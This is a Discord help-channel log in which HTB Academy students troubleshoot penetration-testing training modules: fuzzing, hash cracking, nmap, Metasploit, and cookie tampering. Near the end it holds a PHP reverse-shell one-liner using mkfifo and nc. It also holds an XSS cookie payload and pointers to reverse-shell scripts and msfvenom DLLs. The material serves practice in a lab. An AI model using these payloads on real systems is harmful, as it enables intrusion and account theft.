#modules
@feral gyro it would be if you could connect. Maybe it's fixed now but I spent a day and a half fighting connection issues.
it's a mysql error u faced
Yes and my command was correct. It just would not connect from my vm or pwnbox. I was told they would fix the problem
do u still remember the error code
It would connect once every 8 to 10 tries
Yes sir.. hang on
┌──(kr0w㉿kali)-[~]
└─$ mysql -h 64.227.39.88 -P 31239 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '64.227.39.88' (115)
┌──(kr0w㉿kali)-[~]
└─$ mysql -h 139.59.175.51 -P 31040 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '139.59.175.51' (115)
┌──(kr0w㉿kali)-[~]
└─$ mysql -h 139.59.175.51 -P 31040 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '139.59.175.51' (115)
└─$ mysql -h 139.59.175.51 -P 31040 -u root -ppassword
ERROR 2002 (HY000): Can't connect to server on '139.59.175.51' (115)
yep same error u can fix this
I gave up.
I've rebooted, and get the same error on 3 machines.
try this command
Including theirs
i run this on my vm
If I decide to try it tomorrow I'll try it
cool
But the fact that I got the same error, on 3 completely different instances tells me the problem was on their end and not mine
but u can solve it
brother
Oh I know I can. I actually have quite a bit of experience with mysql databases. Been using them for more than a decade at work.
I expected to cruise thru this and when it works I do.
cool
well good, looks like it might be fixed.
yep i think so
Maria Maria, she reminds me of the west side story
So first I have to: "sudo apt-get install libssl-dev" and then add sudo to make "sudo ./configure && sudo make"
Why didn't hashid work?
Which module and section is that?
CRACKING PASSWORDS WITH HASHCAT - Cracking Miscellaneous Files & Hashes
By looking at their spreadsheet on supported hashes, 7Zip isn't on the list so I guess it could be a reason
(Source : https://github.com/psypanda/hashID/blob/master/doc/HASHINFO.xlsx)
It's strange since it's so well known.
Yeah, + hashid hasn't been updated for 7 years soooo
Do you advise a newer tool?
I don't know any more recent that does the same job yet, I only use the hashcat website and two others
https://www.tunnelsup.com/hash-analyzer/ & https://hashes.com/en/tools/hash_identifier if I need, but hashcat website is enough most of the time
Thanks. Just tried and only the hashes.com could identify that it is a 7-zip but not the mode.
Yes only Hashcat (afaik) is capable of that
?
Only Hashcat can recognize the mode if I don't make any mistake
the problem is that I have to insert the mode (-m) so... how can I discover it?
oh ok I didnt know it was there. If its there the tools should be able to tell the mode. Next time I will search in the hashcat site. Thanks !
Anytime 
Im currently stuck at burp intruder. Here's the task:
"Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag."
Here's what I've done: Sent a GET with /§admin§/, I added the .html as payload and I successfully receive a 200. This is where im stuck, the .html returns 403 forbidden.
on which module
Using Web Proxies -> section Burp Intruder
letme check
cheers
got it
Really? I still havent gotten it to work :p
wordlist u used ?
I only wrote .html and admin in there cause thats what I was looking for?
u need to use /seclists/Discovery/Web-Content/directory-list-2.3-small.txt
this list
as a payload
let me try
And change the request. /$admin$/ is wrong.
admin is static.
ah ok, thanks
burp will take so much time
something more like /admin/$file$.html
if u know ffuf then it will be cool
i don't recommend burp for this question
coz it will take hours
cool then try burp
im just following the curriculum to learn it all, i dont know whats better. But I can imagine the wordlist search will take forever
am sorry brother
Why would they make such a lengthy exercise when its brand new, just started burp lol
look this
ho i need to check this before
u did this ?
No, just following the conversation...
this is all about nos
so u dir name will be like 2.html or 44.html something like this
so u need to craft a wordlist of numbers upto a given length and then start fuzzing
the correct one is in b/w 1 ---> 3000
This is a mess. Ok so I can use a wordlist with 1-3000 then?
tried this but need the number
ok so i found the numbers option
Let me try this...
Im running it by numbers and not sure what to put as request. Trying /admin/§1§.html and then we'll see what happens
yep
that's the reason why i used ffuf
Got it with ffuf already and Burp is just taking ages...
idk if any other method exists
hey dm me the no
ffuf im learning longer down the line lol
but this feels way too hard to be introduction to intruder 😦
im searching for 1.html, 2.html and so forth now up to 3k
its probably so simple im overlooking it then 😛
You should scroll through the results. And look for 200
still not sure about the request though, what to write there
/admin/§§.html is what i have
yea i included a grep for 200
This is a good exercise for Burp, but terrible for efficiency...
they made it for pro users
Still terrible for efficiency. Why paying for Pro if you can get it with ffuf for free :-P @feral gyro
Well if I get the request wrong I guess I have to do it all over. It feels wrong already
yea but pro has more features
I want to look in the admin directory, but you say I cant use /§admin§/
Anything within $$ is going to get replaced with your payload.
/admin/§file§.html then file is replaced by the number in my wordlist?
but i agree with u @rustic sage
ok i see, that helps 😄
Im good to try for myself a bit now, will do from 1500 as I had to redo it again. Thanks a lot for help! Been stuck here for hours
Maybe go to the Positions tab of your running scan and send a screenshot, if you are concerned
ffuf is better coz it is able to filter response codes
same as burp
@dusty timber Looks great. Just double-check that your target machine is still up
Google to <ip>/index.html
I just reset it so it should be enough time now xD
Thanks again @rustic sage and @feral gyro
This should work? Cause it isnt lol
It should return an empty page
Just a sign your target machine is up
Considering how slow it runs, even from 1500 seems exhausting...
You don't learn anything by waiting an hour for Burp...
Most platforms like HTB have a rule for box-creators, that a hashed password should get cracked within 5 minutes or so.
Take your time...
And if you would have used a regular directories wordlist, 100% sure your target would have timed out before you hit the answer. (line number in the 8000s)
Holy smokes
I am considering getting burp pro, just not yet, its "too soon", or it was until this exercise lol
Just to speed things up
Maybe for other kinds of tasks. There are excellent free tools for fuzzing.
yep
wfuzz etc
well I see sql injections is still not responding this morning. It pings until I try to connect then drops. At this rate I will finish the module next year.
same error as yesterday and the night before. ─$ mysql -h 64.227.39.88 -P 31108 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '64.227.39.88' (115)
try
restarting mysqld
and I am telling you I spawn the target, and I cannot ping it or connect
try it now
ho sorry on phone right now
I have tried from pwnbox and a vm
mm
I have rebooted, tried restarting the service, nothing works
send me a screenshot after u run this command systemctl restart mysqld
┌──(kr0w㉿kali)-[~]
└─$ systemctl restart mysqld
┌──(kr0w㉿kali)-[~]
└─$ ping 64.227.39.88
PING 64.227.39.88 (64.227.39.88) 56(84) bytes of data.
^C
--- 64.227.39.88 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 2042ms
and pwnbox doesnt have that service
i wish i need to try it now
sql injections
Section?
sql operators
The IP just does not respond
I tried to get help from staff yesterday but someone ( wont blast his name here) was rude and claimed it was fine until I showed him the error then he said they would fix it asap.
it's odd
but earlier one guy also mentioned about this
at that time i found that command
ho great
never changed my command.
@lethal atlas i fired up the sql injection module on my end cause i wanted to test , i'm also not able to connect to any target
Same here
Thank you for trying. I knew I was not crazy. I legit had to keep trying over and over and over until it finally connects. Then I can finish a section and have to fight the next.
question. I've decided to run a vm on my laptop. Im running VMware player. I'm going through the getting started module and I'm at the point where it has me set up encrypted LVM. I dont have this option. I downloaded the machine directly from ParrotSec. is this normal?
I dont use parrot so I am not sure how the setup works for it. But I believe that having the LVM encrypted is a good security practice but not absolutely necessary .

yea Im trying to but I don't have that option unfortunately the only options i have are these
is it under advanced options?
no just recovery mode. i gonna redownload everything and see what happens. thanks for responding.
Hey. Did you get any help with this?
your code is incorrect.
if you need help I can assist you
When I input the response for the answer on Hack The Box, it was telling me it was wrong so I assumed it was my code.
You are super close, just some adjustments to some syntax will get you there. DM me if you want

Read through the provided information carefully. Under the description of one of the tools it says it can be used to identify the type of CMS.
why does this command not give any results?
Do you get any output if you run it without the select?
it prints out everything. thats the weird part the tutorial shows to use the select cn
Have you tried adding "-property *" to the Get-ADObject command?
i have tried that and it would throw a massive error.
but now the remote desktop is broken
#613049811481919508 anyone able to explain to me how to find the userAccountControl value set to a specific flag? like i managed to get to the solution by accident but thats not the way to go about this and i would like to learn etc
i figured out it has to do with the bitmask but it doesnt make sense what i found to the solution and then the next question is completely different again 😮
Module Web Requests
Section POST Method
Question: Login with the credentials (guest:guest), and try to get to the admin user from what you learned in this section and the previous section.
I need help trying to convert get an admin flag from the system
I tried editing the cookie to admin, admin_, admin_xxxx to try and get a response, but it always replied with
Welcome, guest_xxx
The replacements for the cookie I tried were decoded through Base64 into guest_xxxx, changed into one of the mentioned things, then recoded
^Nevermind, I was doing the right thing, it was the server that was down for like 40 minutes that was not working correctly
is there a reason gobuster is spamming me with progress? when i use it its like this long line of progress:..../..... (....%) makes it harder to read the reports
Do you still need help?
.
good morning fellow keyboard jockeys.
Morning sk. How ya be this fine morning?
Little cold here but could be worse.
about to do a shit ton of server upgrades. yay me lol
26 to be exact
thank you for your hints. I finally got it ^^
29 over here lol. I get it.
Can someone help me? I'm on Login Brute Forcing module on the last part Brute Forcing services I'm stuck doing the lists
On this question?
"Once you ssh in, try brute forcing the FTP login for the other user. You should find another flag in their home directory. What is the flag?"
One before
Pls
Hi guys, on getting started module, public exploit section, I try to get the flag. I identified a well-known CMS running on port provided in the spawn link of question section in the form IP:port. I'm stuck with that. I can't find any related public exploit. Is there any other service I missed out?
You have created a word list william.txt in the lesson "Personalized Wordlists". Try it with this list.
Take a look at the plugins.
Thanks I found it! I'm going to try using the public exploit to get the flag
I have to say, for all the problems I had with the sql injection module, the skills assessment was kind of fun.
Having some trouble with Windows Privilege Escalation - DnsAdmins. I was able to add the netadm to Administrator but I am unable to cat the flag
@slow ruin try using msfvenom to create a reverse shell .dll
I ran into the same problem
So no need to create the adduser.dll and send that over? Create a reverse shell.dll and send that over instead?
awesome thanks for the hint!!
Anytime dawg!
Hmm, guys i'm doing HTB Academy - Web Requests module. Im in the "POST method" section. And i can't find the flag. Isn't the flag supposed to appear on screen, or in any of the HTTP responses/source code. I completed the challenge, but didn't receive any flag.
Am i doing it right? I manipulated the cookie, got Admin...and no flags.
If you did all the steps correctly it should give you the flag.
I'll just repeat.
It didn't?
So, i guess the problem's not with me...
not sure what changed but I just encoded the cookie again and it worked
i used burp decoder to encode
I didn't use it.
If you used cli base64, then there is something to be careful about
when you echo, echo adds a line-break, which also gets encoded
OK :)
yeah thx for the info tho
DM me so we can discuss in detail
I'll try alone, if i can't i will DM.
adding -n to echo removes that line break and you get the "right" result. just a piece of info :)
@rustic sage that is really good info. Thanks. My notes must have been from CLI since I had a different value than Burp gives.
if i try to use sudo commands in the 'Linux Fundamentals' modules i need to use a password but what is this password i tried my HTB acc password but that doesn't work pls help (:
@olive void There is a file with credentials on the desktop
credentials.txt or something like that
and password is in there?
There is only one way to find out
hhmmm i can't use Workstation bc i have no spawns left so i will have to try tmr, thx 👍
If you are going to use pwnbox you will need to look in that file each time as it changes but I recommend setting up your own VM or workstation and using VPN
oo oke thx
Hi, Attacking common application Splunk > Enumerate the Splunk instance as an unauthenticated user. Submit the version number to move on (format 1.2.3) , this is really weird i cant get the version correct any help pls
See Help about
still ...

in "intro to network traffic analysis" the exercises for "Packet Inception, Dissecting Network Traffic With Wireshark" are extremely broken. Using the pwnbox interface, the NoMachine client keeps getting disconnected. I was able to answer the first question with the downloadable files, but the second question about identifying the employee responsible seems to be impossible to do without the live instance
I fought that same issue. I finally managed to limp thru it all after multiple reconnections.
yeah, i was finally able to as well
there were a lot of things with that module that i felt were not good questions
Hello
anyone able to help me with Active Directory LDAP as in the skillz quizz it asks for the former employees OU but when listing all OU it does not show?? am i missing something?
is anyone else having issues with htb docker ip's? i seem to be unable to connect to the ip address given in an academy module
I was having issues with lab vpn last night
Havent tried mods recently tho
i've tried resetting the target, but that only works sometimes
ostensibly i know what i'm doing
oh well, i'm taking a break
I need someone to help me with command Injections > Identifying Filters. The question asks which of the 3 is NOT Blacklisted, and in Burp I get a response using one of the three but when I try any of the 3 as an answer it says im wrong
Windows File Transfer Methods 2nd question i'm confused should i do the transfer from linux to windows, windows to windows, windows to linux , i tried the upload methods i think there is something wrong with the urls
im completely stumped on active subdomain enumeration. i have tried everything and cant seem to figure out question 2. I accidentally fat fingered putting the right answer, but for some reason i can only find 1 name server. i have spent 2 days on this and it just makes no sense to me 😦 anyone help me out?
@modest moth is this Information Gathering Web Edition?
yessir
Asking what the number of zones is right?
yea the second question.
i got the answer right but it was an accident. i can dm to keep spoiler free
Sure
Someone has been hacking some boxes
admin:ftp@dmin123
I'm working on the getting started module. im not sure why it's not connecting. im using ftp@dmin123 as the password
under service scanning section in getting started
@hazy grotto i just took a look at it, the directions say to connect as the Bob user no?
umm ok maybe this is where im confused
i went into ftp and pulled this login info admin:ftp@dmin123
i thought bob was just an example
i was following along and the username info was different
lol
ok checkmate
can you explain this file i found?
Probably not, I did this module a while ago lol
i get you are more than likely right. i just want to know why that file was in there and gave different info
I think it might just be serving as an example
connect via anonymous ftp , and find file(s) that contain sensitive data
it's a somewhat common thing in CTF's , to find user credentials in one location and use them later on
well i was able to get it. thank you jared
anytime brother!
Does anyone know if with the annual subscription you get any monthly cubes as well or you have to pay extra if you want to do any of the Tier III/IV modules?
As a subscriber you get a certain amount monthly. If you want to access tiers 3 or 4 you need to up the sub level. If you just buy cubes, you will not earn enough to keep moving without buying more.
Right, the annual subscription says it's the best deal but only says you get instant access to all up to Tier II but doesn't mention any monthly cubes
So I'm guessing for Tiers III and IV you still have to buy extra on top of the annual sub?
Or maybe it's better to just go with the monthly ones and get the monthly cubes...
I guess I didn't look at annual.
Lol
But I have student account and get tier 2 for cheap
I have student account. Do i get monthly cubes?
Nice, yeah, I'm not a student so have to go full price, I really wanna get into it but the complexity of the pricing model is holding me back 😅
no
😭
I have student too, we will be alright
You get cubes when you complete the modules tho
I don't see the advantage of yearly
We should have enough for one 500 cube mod
18 a month is 216
And you get all of tiers 0,1,and 2
Other than a test voucher.
But let's be honest, how many people are really ready for a test after just 1 year unless they have previous experience
How hard is the test?
Are there any modules that are very important that are tier 3/4 ? I just bought linux priv esc
Im not sure, they look interesting but also dont feel like im missing out on too much.
Im thinking about lin privesc or bloodhound
Lin and win priv esc sound good to me but I think if you finish all the others you might be serious enough about it to spend the extra. I mean, the test is not cheap.
I think we might be the first graduation class of htb academy
I wonder if they will have a party for us
I'm gonna be the stripper
I would prefer not to see that 🤣
you can tip me in cubes
hey i ran into a problem in oopsie starting point ......i have to upload a php reverse shell in webpage...i have no clue how to do it ...no explanation in the walkthrough either ...can someone help me?
use the upload on the website and upload this file
https://github.com/BlackArch/webshells/blob/master/php/php-reverse-shell.php
remember to change ip and port, before uploading.
maybe try looking into #starting-point also i recommend payloadallthethings
@here we will be taking the module 'Web Requests' offline for the next 30 minutes, as we will be releasing version 2.0 of the module.
Hey guys, can someone help me at brute force “skills assessment - website” module?
sure can
Sent ya pm
@here The version 2.0 of the Web Requests module has been released, with entirely new content.
If you have fully/partially completed the module previously, you will not lose your progress, but you may still find it interesting and beneficial if you decide to take the new module.
The module is a 'tier 0' module, so anyone may take for free.
Thanks, Might have to check that out. Do you know if there are plans to work on the SQL injection module?
do think it needs a remake or some enhancements? or are you looking for future sqli modules?
It has had a LOT of connectivity issues the last few days. Others here have confirmed the same errors I was getting .
It was mainly in the SQL injections section. Took me 2 days to get thru it. The skills assessment section didnt give me any issues though.
AND, btw I loved the skills assessment.
we have some big things in the works that are taking precedence right now but we are working through updates to many of the older modules (File Inclusion, Hashcat, Linux Priv Esc, BloodHound, etc.) We are committed to quality content and an enjoyable learning experience for all on our platform and we are constantly evolving, improving, enhancing our procedures. we value each of our students and your opinions greatly as the platform would not exist without your support so always feel free to reach out to any of our team or to me directly with feedback, bugs, errors, requests, etc. know that we do read and discuss every bit of feedback we receive through various mediums and the best is yet to come!
yeah we're working on these connectivity issues as well, so they should be fixed soon
I just want the entire Hackthebox team to know that your hard work is appreciated. I have tried other platforms to learn and Academy is by FAR the best imho. I have enjoyed the modules, even with the occasional issues and feel that the method employed has helped me to understand and build. Keep up the good work and forgive an old grumpy guy like me who gets frustrated from time to time. 😄
thank you. that means a lot. we write with passion and try to incorporate our own experience into the module sections with stories, tips, etc. its a fun but challenging process. and I can assure you I am older and grumpier 🙂
Just curious, How old are you? I am about to turn 52
oh then you win. I'm 36. crazy I've been doing some sort of IT work for half my life now
Same. I got into wireless internet in 1999 and have worked for ISP's up until 2 years ago. I got too old to climb towers so I took a desk job doing IT for a small college. I have always wanted to be in net sec so I started trying to learn. Glad I found HTB.
wow that's an awesome journey. I started out in a small office doing stuff like crawling under people's desks to install UPS devices, upgrading ram and OSs etc
crazy where life takes us my friend.
hello i need some help
i am on module getting started on the section knowledge check
i am using gobuster to find extensions of the ip
but i cant load the main website
should it look like this?
Yes it appears the page is loading properly. If you are just fuzzing for files/directories then it really shouldn't matter what the page "looks like" if that makes sense
that "lorem ipsum" is just placeholder text used for websites
before the host was /nibbleblog but i cant find something now
@west canopy do you know what should i do now?
Gimme a sec ill take a look at it on my end
What section is this?
knowledge check
under whats next
the last one
ok i see it
i did this a while ago and didn't take any notes. I think i ended up using metasploit on this section
I didn't take very good notes back then either
I take crazy detailed notes now
your cherry tree has a gold chain
and tooth
Hello, doing the Getting Started module and im currently on Public Exploits. When I spawn the target box and run nmap on it I get "host seems down". What should I do?
@dry girder try adding the -Pn option
"nmap -h" -Pn tests all ports as open regardless
Thank you @west canopy @lethal atlas
Yea i think nmap typically tries to ping the target first before sending its probes, -Pn disables host ping
and is it normal if it takes a lot of time. The last box I ran nmap with -sV and -sC flags was done really fast. I tried running without the flags (only with -Pn) but got nothing useful just that the ports are in ignored state
Yes when you use -Pn , nmap actually tells you that "All addresses will be marked up and scan times will be slower"
man I just looked at my notes on getting started. Or should I say complete lack thereof
I might have to go back and do it again
You guys ready for the new easy box to drop tomorrow?
my body is ready
If I wasn't super busy tomorrow I would be
just finished helping someone with that Brute Forcing module. Thats VivisGhosts favorite
have you considered adding a module about hardware?
ls
Hi community, I'm taking Broken Authentication, weak Bruteforce protections, second question
Some help?
@surreal rain sketch
Thanks
Module --> WEB REQUESTS
Section->> PUT & DELETE
If you go down to the PUT section, there is a typo, it is repeated twice:
nosoybek@htb[/htb]$ curl -s nosoybek@htb[/htb]$ curl -s http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City | jq
[
{
"city_name": "New_HTB_City",
"country_name": "HTB"
}
]
@HTB Academy
Hello
i am having some problems
i am on module :ATTACKING WEB APPLICATIONS WITH FFUF
i should get something like this
but i get:
on which section
i am on : sub-domain fuzzing
let me check
kk i am holding
working for me
let me restart the machine again
is this what you typed : ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.hackthebox.eu/ ?
@feral gyro
nope am on my vm
yea what did you type?
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.hackthebox.eu/ -v
ok let me see
-fs 403
same one
I seem to be missing something in the "hacking wordpress" module. in the skills assessment, the question "Submit the contents of the flag file in the directory with directory listing enabled." i found two places where directory listing is enabled, but no flag file
nvm
too far in rabbit hole
try http instead of https
but it's the actual one with https
not the spawned one
where does it say that?
it's on subdomain enumeration
on the ffuf module
I know, and nowhere does it say https
- HackTheBox has an online Swag Shop. Try running a sub-domain fuzzing test on 'hackthebox.eu' to find it. What is the full domain of it?
but i think htb is having an https one instead of http
what about accessing it via the browser
is it http on https
or it is changing automatically
it changes it automatically but it doesnt matter.
ffuf -w /usr/share/secLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.hackthebox.eu worked
mm but the problem he faced is due to the wordlists
and https
but u said to try http although it doesn't really matter
I just know that sometimes trying http or https over the other works.
I guess I should read closer. I thought you were the one having the issue. lol
figure it out?
mm
well if everyone is doing good I am gonna go finish Command Injections
Search also in subdirectories
need some help with Login Brute Forcing skills assessment-website. i got the first flag and im trying to brute force the admin login form. having some trouble getting results. I think i might be messing up the fail string because i get a bunch of user name and password matches.
@rustic sage feel free to DM me 🙂
Short question in the Linux modules. Has anyone any idea how I can look for that? I tried with apt list and then I piped it into wc but that seems to not be working
@opal vapor try doing something like: dpkg -l | grep -c 'ii'
Which module?
Hi all, i am in the information gathering module and i am currently on the virtual host portion.
At the assessment part it says "vHosts needed for these questions"
Do i point the ipaddress that is spawned to www.inlanefreight.htb in /etc/hosts
@modest moth yes, once you discover a vhost you will need to add it to /etc/hosts in order to navigate to it in your browser
i'm having some trouble getting the reverse shell to run from "Attacking Common Applications" under "attacking splunk"
i edited the script that was provided to put my own ip/port in, but i'm not getting any connections back
ugh..nvm. i'm just an idiot
guys
can i ask you something
i am on module : File Inclusion / Directory Traversal
Getting started module:
Web Enumeration
I was given a IP Address with 64.227.39.89:30672 I went through the whole module with it working up until the Certificates part and it asks this.
Certificates
SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use. Browsing to https://10.10.10.121/ and viewing the certificate reveals the details below, including the email address and company name. These could potentially be used to conduct a phishing attack if this is within the scope of an assessment.
This is a different IP address than the given target and it doesn't work when i use the link above. When i enter the IP address of my target ip https://64.227.39.89:30672/ it just times out from loading. Same thing when I try https://64.227.39.89/ taking off the last 5 digits.
When i ping : ping 64.227.39.89
PING 64.227.39.89 (64.227.39.89) 56(84) bytes of data.
I only get one ping back and nothing in return
on the section: Local File Inclusion
I'm trying to view the certificate like in the module but it times out
are you using vm?
pwnbox on this website
Why can't i view the certificate
and under the robots.txt section. I try navigating to the /private url and i never get anything
idk what im doing wrong
what do you have to do? send me a screenshot
did you try to restart the target and your pwnbox?
which section are you on?
@hazy grotto
Certificates
SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use. Browsing to https://10.10.10.121/ and viewing the certificate reveals the details below, including the email address and company name. These could potentially be used to conduct a phishing attack if this is within the scope of an assessment.
Web Enumeration
First web enum, scroll down to Certificates
This is the 3rd time ive had a new IP
I tried twice 2 hours ago and now again.
Idk if its because Im not understanding something but i was following along step by step
which command are you using?
I'm trying to enter the IP into the URL
yes
and send me a pic of your result
Certificates
SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use. Browsing to https://10.10.10.121/ and viewing the certificate reveals the details below, including the email address and company name. These could potentially be used to conduct a phishing attack if this is within the scope of an assessment.
This is a different IP address than the given target and it doesn't work when i use the link above. When i enter the IP address of my target ip https://64.227.39.89:30672/ it just times out from loading. Same thing when I try https://64.227.39.89/ taking off the last 5 digits.
When i ping : ping 64.227.39.89
PING 64.227.39.89 (64.227.39.89) 56(84) bytes of data.
I only get one ping back and nothing in return
send me a screenshot bro
try whatweb <ip>
basically to lead to the question you dont need to go to certificate page
@hazy grotto I believe they are talking about the SSL/TLS Certificate as just an extra tidbit of information.
right but i would just like to see the end result but it times out
It's not an HTTPS website so there is no certificate
@raven cairn GET YOUR OWN FROSTIE
i don't think you are old enough
😭NOOOOOOOOO!!!!
You look pretty young
you can have some Barq's rootbeer
Is frosty alcohol?
soda pop
I thought it was the thing at wendy’s 😋
Dairy queen has the best ice cream ever
i dont know what chemicals they use , but i want more of them
Agreed
You guys think this is timing you because of my slow internet?
nvm i had done that jared
then took the port off
got a fourth ip and it's working now. with the port like you said
hey jared can i dm you?
sure
could you point me in the right direction?
Well I managed to find the right piece of the puzzle, but it was dumb luck. I don't understand why a file even existed at that directory
So the Firewall & IDS/IPS Evasion: Medium Lab is giving me a headache. I don't think to get the DNS service requires using nmap as sudo right?
@round lagoon DM me if you need a nudge 🙂
hey anyone online not busy that can help with login brute forcing? having some issues with ssh
found a working u.name/pass pair but can't seem to ssh
nvm im blind.
Anyone mind providing some guidance on Getting Started > Public Exploits? I've worked it all the way to setting up the exploit in MS
finally done with the login brute forcing module!!!
Nice work 🙂
thanks. took me longer than I care to admit but im glad i stuck with it. Thanks for the help @west canopy
@floral scroll feel free to DM me bud!
Maybe because an administrator forgot them there? i don't know.
Hi all any help on the getting started module knowledge check?
I found the version of the content management system but i dont know what to set the things to in metasploit. I know Rhosts is set to the target IP however, i dont know what to set the TARGETURI to, please nudge me or hint me as to what to set that to. im trying to gain an initial meterpreter session.
@modest moth this is the GetSimpleCMS right?
I believe you can leave the TargetURI as default
alright thanks, will try it out
@west canopy thanks again! guess i was doing everything right i just was stressing over the URI haha. will try to do the exploit without the metasploit now.
Doing the footprinting module and need sudo to be able to run mount for NFS but don't know where to find the pwnbox password to run sudo - anyone know?
it's on the desktop
Thanks 🙂
little confused on how i do the "connect to htb" i selected the pwnbox option it loads for a few seconds and still says offline
Are you a subscriber.
If not, you can have only one pwn box per day.
hi to all/ Who can help me with module Cross-Site Scripting (XSS) - 'Try to use XSS to get the cookie value in the above page' I can't figure out what the link should look like. There is no example in the module itself, there is only a phrase that the task is similar to the previous module. But I don't have enough knowledge.
this is payload - #"><img src=/ onerror=alert(document.cookie)>
How to insert it into the link? I'm not familiar with the syntax at all
Can someone give me a hint. I have tried out ls -al /var/log and top | grep ProFTPd but that didn't work.
u need to add the payload after this
It's part of the Linux module
Thank you so much!!!!
Anyone tell me how i start learn hacking
try ps -aux | grep process_name
Hii
@azure monolith Hackthebox Academy is a good place to start. Start with some of the fundamental modules.
Suggest any course
Learning process
Intro to Academy
Linux Fundamentals
Introduction to networking
Web Requests
Intro to web applications
Getting started
I would highly recommend Linux fundamentals if you are not comfortable in a linux terminal
Thanks
@azure monolith If you try a question and get stuck for a bit, we can help you out over here 😁
@azure monolith I’d recommend Linux Fundamentals and then practice Linux terminal skills using OvertheWire war games, starting with Bandit: https://overthewire.org/wargames/
Hello people, I am having trouble with Firefox, it may not be the right place to discuss but please help me. I have tried most of the commands, seen videos, nothing is helping.
@cobalt rose What kind of trouble are you having?
i was just going through a course. and i had to take the interface down and i did that, i thought trying to confirm if thats really happened. and i opened up the browser and then i get the error having trouble finding that site.
Are you using a VM? I take it you've tried commands to stop and restart the interface.
yes sir i am using VM.
Personally I've had issues with my Kali VM. I used to keep it on Bridged Adapter then one day the network interface just died and I couldn't pull an IP address. So i just ended up rolling it back to an old snapshot and setting it as NAT.
I'm sure you've already tried this, but I would probably just google and try any command possible that might restart the interface. If that doesn't work then I would just restore it back to an older snapshot. Wish I had a better answer for you dawg 😦
yes sir i have tried changing it from bridged netw to nat and vice versa. yes sir thanks a lot for the help. i will try to restart the interface and other things.
Is there any one available to help with a module?
Possibly, which module?
Network enumeration with nmap, nmap scripting engine
DM me 🙂
yo can anyone help with the Ffuf module?
@rustic sage I got you bruh!
word
can i dm you?
of course
I'm doing the Fundamentals of Active Directory and I have no Idea what is going on
I am passing the questions but all this stuff is going over my head 😭
How do I learn more about AD???
Any good advice?
I'm doing information gathering module section active subdomain enumeration, I'm really not sure how to find more zones, I have found 22 unique subdomains on the first zone, but I'm stuck, any help?
Look at the hint.
"There are several zones
try bash scripting
ok thanks
Can I DM you about an earlier question in that module?
@rustic sage yes ^^
Hi FeatherKnight, I have been stuck here a bit too. There are 2 exploits that can be used to exploit the GetSimple platform. Both of them having the default TargetURI work so you do not need to change that.
Yea I got it figured out! I was over thinking it. It was a mix of me thinking I needed to fill it out and the machine expiring lol.
Nice! Have you figured out the second part for priv escalation? I am CRAZY stuck there.
Hello all, I have a noob question about using cURL to search for flag through JSON POST request to search.php. I just started with HTB and it seems as if I just got lucky to locate flag on previous modules. Any help will be appreciated.
Yea, I got it done. If you want dm me and I can nudge you in the right direction
by the way, it is the Web Request module
hey so i started the beginner module for https and i cant even answer the first question "+ 1 To get the flag, use cURL to download the file returned by '/download.php' in the above server." i used up all 120 min and had no idea what to do i kind of just clicked things and stared at the background any help what to do or just give me the answer and i will work backwards
on which section
http fundamentals the very first one
but i dont understand what the question is even asking of me
like what doest it want
ok i will try whenever i get another free instance
means
im still really confused because the question says to get the flag
so where do i type curl http....
when u use curl u will get the flag as the output
on terminal
open the linux terminal and then run the curl command
yea when i started the instance i just got a blue background with some files
but where do i click to see the terminal
ahhh ty so much i will try tomorrow or something
Sup folks ! Could anybody help me on Skills Assessment from Using Web Proxies ? I'm on the third task. I've in many different ways to save the question, trying with burp and zap.
Have you done that module? I would like to ask you something about it
Yes of course you can ask
I can help with that
Who can help with Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. in the Information Gathering module???
I have completed that module but to be honest I got lucky on that answer. The reason I got it was just dumb luck. I picked a number from something I saw in a scan but found out after that it really was coincidence
The same happened to me. And now, I can't even see the hint XD
The way it was explained to me is that the presence of "A" record(s) is one zone, "NS" servers makes it two, and if there was "MX" then that would make it three.
Thanks Jared!! I thought maybe it had to do with the number of NS servers or something. lol
Yea I'm still not entirely confident about that one. It's still very possible I am incorrect haha
Your explanation makes much more sense.
I am so mad!!! Somehow all my notes on the command Injection module did not save. :(((((
Now I have to go back and redo everything so I can note it all. AGAIN!!
apparently not. Although since the document autosaves I am not sure how it happened.
Well, I just found another copy!! All is saved!! Praise backups!!
question. i just set up my personal Parrot vm and now im trying to figure out how to use it for academy modules. i can't seem to find the vpn option in the ffuf module. is this normal? or am i looking in the wrong place. usually i see it around the cheat sheet at the bottom of the page.
@rustic sage hmmm.... I'm actually not sure.
It looks like it's missing in the FFuF module. But i just checked Windows Fundamentals and the VPN key is located here:
yea thats what i saw. i looked on reddit and ppl are saying to just connect without the vpn. seems kinda suss
I've seen on some modules I was able to interact with the target while I was not connected to the VPN. Specifically when it looked like a docker instance of some sort.
Like if the target was 10.129.108.223:30508
ahh ok. ill give it a try.
i need some help
i am on module WEB REQUESTS
on section HTTP HEADERS
this is the question
can anyone help, i found this :
there is no flag
can anyone help?
Module: Getting Started
i'm having a hard time getting a reverse shell on Nibbles, i uploaded the php line using the My Image plugin but for some reason when i try going to (ip)/nibbleblog/content/private/plugins/my_image/image.php it won't load, i tried both on my linux machine and the pwnbox, but i'm getting the same exact result
can you send screen?
sure wait a sec
can you show me
1: your php file
2: that you have uploaded successfully
3: show me the link
@west canopy i dont have this
Looks like they updated the module, this section wasn't here when I first completed it.
i'm using this php line <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [VPN IP] [PORT] >/tmp/f"); ?>
@rustic sage Maybe try refreshing the page?
yes let me do it again but wait let me try help this guy
can you show me your ifconfig tun0?
ok
so the command is going to be:
<?php system('id'); ?>
